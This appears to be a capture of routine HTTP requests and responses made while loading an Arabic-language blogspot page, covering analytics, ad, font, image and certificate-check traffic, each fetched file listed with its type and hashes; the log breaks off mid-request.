Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Upgrade-Insecure-Requests: 1

                                        
                                             52.215.62.169
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Status: 200 OK
Server: Hsoub Nginx
Set-Cookie: rack.session=WX4YHBFOWSxLUTzboHXsNPlaG6JEDqL%2FKdWtEH2QDW62qFZp86YWjKNm1DxuLIJmW0pifppzJpX%2BlY9qNqGgG37baaIEMToQn6Iasi70oHU%3D; path=/
X-Powered-By: Hsoub, Phusion Passenger
Content-Encoding: gzip


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   160
Md5:    e02064e580f3b174b8a196f2a7d7126a
Sha1:   242002d203dc0aceea6eee0ea4d21aef0c7a6a06
Sha256: 87faf47a36723897e1c84791187be1acca8d84887f8ae071f37d8ee4d0f24128
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /show_ad?s=250x250&adplace=1505480082862007&hf=0&rcic=0&_=0.10858000807749468 HTTP/1.1 
Host: ads7.hsoub.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 849
Origin: http://mudwnp.blogspot.com
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Upgrade-Insecure-Requests: 1

                                        
                                             52.215.62.169
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Status: 200 OK
Server: Hsoub Nginx
Set-Cookie: rack.session=yhfefILD8wq7jjGKv6fnuqgp%2FfQt43287D%2BWVlhlVuh04Tjb%2FfK07CKDz4XZpa2RH9HC7VunsletmOMb%2BWIAMji9dXuj757HvTquH89AX6E%3D; path=/
X-Powered-By: Hsoub, Phusion Passenger
Content-Encoding: gzip


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document, Unicode text, UTF-8 text, with very long lines (2577), with no line terminators
Size:   957
Md5:    1e2f9de09aa2fed1bf0683b8a6cfc5cc
Sha1:   d081c62ed1aa91526b19ea062f4fd8f8939c9837
Sha256: 1d7f1c00e970d827bb54c5ab04444d76dae39c46b3384db9b51b5fed41103fd3
                                        
                                            GET /-2HxFIelZzhU/T-bWA-dfuxI/AAAAAAAABd0/oKu9I2ZSc_4/s640/post_footer_top.png HTTP/1.1 
Host: lh5.googleusercontent.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             142.250.74.33
HTTP/2 200 OK
content-type: image/png
                                            
access-control-expose-headers: Content-Length
etag: "v5dd"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="post_footer_top.png"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 368
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 640 x 5, 8-bit/color RGBA, non-interlaced\012- data
Size:   368
Md5:    520710631c75c14ae51f9088224738b4
Sha1:   6a766bd0a68a046008cbf007213e4a8a59aa1b53
Sha256: e2cac6ddd922226bbc249a89cd547ffce781a92c27eefb1ad247369bada21ff9
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /-Z-SvTLiK4GY/V80OcVDPxrI/AAAAAAAACME/qGSB_hBFvNYccbH_lnfFi0biN0IJfXGxACLcB/s72-c/fix.ajax.page.navigation.problem.jpg HTTP/1.1 
Host: 1.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             142.250.74.161
HTTP/2 200 OK
content-type: image/jpeg
                                            
access-control-expose-headers: Content-Length
etag: "v8c4"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="fix.ajax.page.navigation.problem.jpg"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 3520
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   3520
Md5:    ffbafa7c6d1e6e386745d06a641d33b4
Sha1:   bb414fad97c0a3501939721ccc96f36c345b1932
Sha256: b5ec353022f6aa7b88cffb11133f9788014ae159f2f5a6473fcd3291ad65871d
                                        
                                            GET /analytics.js HTTP/1.1 
Host: www.google-analytics.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             142.250.74.174
HTTP/2 200 OK
content-type: text/javascript
                                            
strict-transport-security: max-age=10886400; includeSubDomains; preload
x-content-type-options: nosniff
vary: Accept-Encoding
content-encoding: gzip
cross-origin-resource-policy: cross-origin
server: Golfe2
content-length: 20039
date: Mon, 28 Nov 2022 10:41:08 GMT
expires: Mon, 28 Nov 2022 12:41:08 GMT
cache-control: public, max-age=7200
age: 2914
last-modified: Tue, 27 Sep 2022 22:01:05 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (1325)
Size:   20039
Md5:    47e6f374ca946fddd5b59871b325736c
Sha1:   baa9282efc8785e84d247c3bff518eaa45f101c4
Sha256: 16580b5c87c58e5702e411f1888fdef511094e4cd6d62bb47d16291ffb25985e
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /gt.js HTTP/1.1 
Host: gt.hsoub.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://gt.hsoub.com/iframe

                                        
                                             52.215.62.169
HTTP/1.1 200 OK
Content-Type: application/javascript
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Content-Length: 1359
Connection: keep-alive
Server: nginx/1.6.2
Last-Modified: Thu, 15 Aug 2019 00:46:50 GMT
ETag: "5d54ab7a-54f"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (1359), with no line terminators
Size:   1359
Md5:    78bc7bcd29852333df281ccb865e91df
Sha1:   79d56182840ae7817ede3fd6085dc0542f74c8e8
Sha256: d6995b5feaa4ccddd7d3f5af4301f052fe7ca329f54c464cd138a976c4d0c600
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Accept-Ranges: bytes
Age: 4723
Cache-Control: max-age=161418
Date: Mon, 28 Nov 2022 11:29:42 GMT
Etag: "63845cbd-116"
Expires: Wed, 30 Nov 2022 08:20:00 GMT
Last-Modified: Mon, 28 Nov 2022 07:01:17 GMT
Server: ECS (ska/F705)
X-Cache: HIT
Content-Length: 278

                                        
                                            GET /r/__utm.gif?utmwv=5.7.2&utms=1&utmn=500091606&utmhn=mudwnp.blogspot.com&utmcs=UTF-8&utmsr=1280x1024&utmvp=1268x939&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=%D9%85%D8%AF%D9%88%D9%86%20%D9%85%D8%AD%D8%AA%D8%B1%D9%81&utmhid=798500289&utmr=http%3A%2F%2Falraush.blogspot.com%2F&utmp=%2F&utmht=1669634981720&utmac=UA-50865882-1&utmcc=__utma%3D14539563.1918545655.1669634982.1669634982.1669634982.1%3B%2B__utmz%3D14539563.1669634982.1.1.utmcsr%3Dalraush.blogspot.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2F%3B&utmjid=1827833613&utmredir=1&utmu=qAAAAAAAAAAAAAAAAAAAAAAE~ HTTP/1.1 
Host: www.google-analytics.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/

                                        
                                             142.250.74.174
HTTP/1.1 200 OK
Content-Type: image/gif
                                            
Access-Control-Allow-Origin: *
Date: Mon, 28 Nov 2022 11:29:42 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Sun, 17 May 1998 03:00:00 GMT
X-Content-Type-Options: nosniff
Cross-Origin-Resource-Policy: cross-origin
Server: Golfe2
Content-Length: 35


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   35
Md5:    28d6814f309ea289f847c69cf91194c6
Sha1:   0f4e929dd5bb2564f7ab9c76338e04e292a42ace
Sha256: 8337212354871836e6763a41e615916c89bac5b3f1f0adf60ba43c7c806e1015
                                        
                                            GET /-E0w1RAuz3R0/VQk0-42wGkI/AAAAAAAABa0/M007wZ3f3q8/s1600/view.png HTTP/1.1 
Host: 2.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/png
                                            
Access-Control-Expose-Headers: Content-Length
ETag: "v5ae"
Expires: Tue, 29 Nov 2022 11:29:42 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="view.png"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Mon, 28 Nov 2022 11:29:42 GMT
Server: fife
Content-Length: 534
X-XSS-Protection: 0


--- Additional Info ---
Magic:  PNG image data, 129 x 45, 8-bit colormap, non-interlaced\012- data
Size:   534
Md5:    dad369af8e67ccf3f64e6ede86f4f35e
Sha1:   494c66319976804a3ae3783b8234a249ae68e6a7
Sha256: 6f17373696df95eea020a9215b90c07b0b9023652e51df6ebd8468f6dcf75626
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /banner/250x250.png HTTP/1.1 
Host: ads1.hsoub.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://ads7.hsoub.com/

                                        
                                             63.34.141.28
HTTP/1.1 200 OK
Content-Type: image/png
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Content-Length: 2335
Connection: keep-alive
Server: nginx/1.6.2
Last-Modified: Thu, 16 Mar 2017 11:39:41 GMT
ETag: "58ca797d-91f"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 250 x 250, 8-bit/color RGB, non-interlaced\012- data
Size:   2335
Md5:    d75c43d65eb8dc6f384969f775f5e8ee
Sha1:   7e995f40bab7b0fc82544e8eee1033063cf684ab
Sha256: d66e8fb4999653291b300d6aa149b2dfd633523749b871423d50c1711470a228
                                        
                                            POST /j/collect?v=1&_v=j98&a=798500289&t=pageview&_s=1&dl=http%3A%2F%2Fmudwnp.blogspot.com%2F&dr=http%3A%2F%2Falraush.blogspot.com%2F&ul=en-us&de=UTF-8&dt=%D9%85%D8%AF%D9%88%D9%86%20%D9%85%D8%AD%D8%AA%D8%B1%D9%81&sd=24-bit&sr=1280x1024&vp=1268x939&je=0&_utma=14539563.1918545655.1669634982.1669634982.1669634982.1&_utmz=14539563.1669634982.1.1.utmcsr%3Dalraush.blogspot.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2F&_utmht=1669634981870&_u=IQBCAEABAAAAACAAI~&jid=226071899&gjid=1661352254&cid=1918545655.1669634982&tid=UA-50865882-1&_gid=916275281.1669634982&_r=1&_slc=1&z=883499566 HTTP/1.1 
Host: www.google-analytics.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain
Content-Length: 0
Origin: http://mudwnp.blogspot.com
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             142.250.74.174
HTTP/2 200 OK
content-type: text/plain
                                            
access-control-allow-origin: http://mudwnp.blogspot.com
date: Mon, 28 Nov 2022 11:29:42 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, no-store, must-revalidate
last-modified: Sun, 17 May 1998 03:00:00 GMT
access-control-allow-credentials: true
x-content-type-options: nosniff
cross-origin-resource-policy: cross-origin
server: Golfe2
content-length: 2
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   2
Md5:    38684612f0c6bb6dfa16da92f4a6878f
Sha1:   6fe62d0dd7db314b7f9bb945672f078e01d27f0f
Sha256: a048e640908046be06e00eab37742b5d5ff80964af58cfd22f7cb2de4dfe375f
                                        
                                            GET /font-awesome/4.3.0/fonts/fontawesome-webfont.woff2?v=4.3.0 HTTP/1.1 
Host: maxcdn.bootstrapcdn.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://mudwnp.blogspot.com
Connection: keep-alive
Referer: https://maxcdn.bootstrapcdn.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             104.18.10.207
HTTP/2 200 OK
content-type: font/woff2
                                            
date: Mon, 28 Nov 2022 11:29:42 GMT
content-length: 56780
cdn-pullzone: 252412
cdn-uid: b1941f61-b576-4f40-80de-5677acb38f74
cdn-requestcountrycode: DE
access-control-allow-origin: *
cache-control: public, max-age=31919000
etag: "97493d3f11c0a3bd5cbd959f5d19b699"
last-modified: Mon, 25 Jan 2021 22:04:54 GMT
cdn-cachedat: 08/18/2022 19:50:49
cdn-proxyver: 1.02
cdn-requestpullcode: 200
cdn-requestpullsuccess: True
cdn-edgestorageid: 722
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
cdn-status: 200
cdn-requestid: 28c58674fd164b829dfd92c0e8118eaf
cdn-cache: HIT
cf-cache-status: HIT
accept-ranges: bytes
vary: Accept-Encoding
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 7712c4704d6ab4f1-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 56780, version 4.197\012- data
Size:   56780
Md5:    97493d3f11c0a3bd5cbd959f5d19b699
Sha1:   1075231650f579955905bb2f6527148a8e2b4b16
Sha256: aadc3580d2b64ff5a7e6f1425587db4e8b033efcbf8f5c332ca52a5ed580c87c
                                        
                                            GET /cgt.js HTTP/1.1 
Host: gt.hsoub.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://gt.hsoub.com/iframe

                                        
                                             52.215.62.169
HTTP/1.1 200 OK
Content-Type: text/javascript;charset=utf-8
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Content-Length: 0
Connection: keep-alive
Status: 200 OK
Cache-Control: private, must-revalidate, proxy-revalidate
Server: Hsoub Nginx
Set-Cookie: rack.session=4LNA%2F4qnjYvCTk6HEzWn1cBeds9yOZuMW2es%2BbMmhIS7SZa6xVPyM0L5TzmvYaEUceTUGfngUAtiPJwbLSiTafiRmwPoGvNR8gdB6GehqXU%3D; path=/
X-Powered-By: Hsoub, Phusion Passenger

                                        
                                            GET /egt.js HTTP/1.1 
Host: gt.hsoub.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://gt.hsoub.com/iframe

                                        
                                             52.215.62.169
HTTP/1.1 200 OK
Content-Type: text/javascript;charset=utf-8
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Content-Length: 0
Connection: keep-alive
Status: 200 OK
Cache-Control: private, must-revalidate, proxy-revalidate
Server: Hsoub Nginx
Set-Cookie: rack.session=C0st8eOpI8uCmIJaimZSQylPT%2BgzZY6tj9XNlQ%2BdusFpurotMqLV8arqTbUFJR4LrH55fk3G9OECbkoLeFgFlXgqp9o%2B3OGfNv5Zu1WizUM%3D; path=/
X-Powered-By: Hsoub, Phusion Passenger

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /ea/droidarabickufi/v6/DroidKufi-Regular.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://mudwnp.blogspot.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                        
                                             216.58.207.195
HTTP/2 200 OK
content-type: font/woff2
                                            
accept-ranges: bytes
vary: Accept-Encoding
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 31248
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Tue, 22 Nov 2022 08:41:37 GMT
expires: Wed, 22 Nov 2023 08:41:37 GMT
cache-control: public, max-age=31536000
age: 528485
last-modified: Wed, 13 Aug 2014 16:50:04 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 31248, version 1.0\012- data
Size:   31248
Md5:    436938da6ed799ca17110e719e4d2e51
Sha1:   b7ef31b6085a9f0963dffe7939abca527724d389
Sha256: a7b09bb9c8e8e2fb189204e08ed94bd8096c118780b5e926847cf2748ca7c5c2
                                        
                                            GET /ea/droidarabickufi/v6/DroidKufi-Bold.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://mudwnp.blogspot.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                        
                                             216.58.207.195
HTTP/2 200 OK
content-type: font/woff2
                                            
accept-ranges: bytes
vary: Accept-Encoding
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 31544
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 23 Nov 2022 18:49:53 GMT
expires: Thu, 23 Nov 2023 18:49:53 GMT
cache-control: public, max-age=31536000
age: 405589
last-modified: Wed, 13 Aug 2014 16:50:04 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 31544, version 1.0\012- data
Size:   31544
Md5:    4650b9f9ddfc876d3fde0a9663539522
Sha1:   7dc2e4b8c259f1bb4d98ec64a39645373d31d71e
Sha256: 31f02fb9a8ae77e5d8bb229bf73f473f783e8155042655926cafca211cd11c98
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Accept-Ranges: bytes
Age: 5709
Cache-Control: 'max-age=158059'
Date: Mon, 28 Nov 2022 11:29:42 GMT
Last-Modified: Mon, 28 Nov 2022 09:54:33 GMT
Server: ECS (ska/F705)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /ar_AR/sdk.js HTTP/1.1 
Host: connect.facebook.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: script
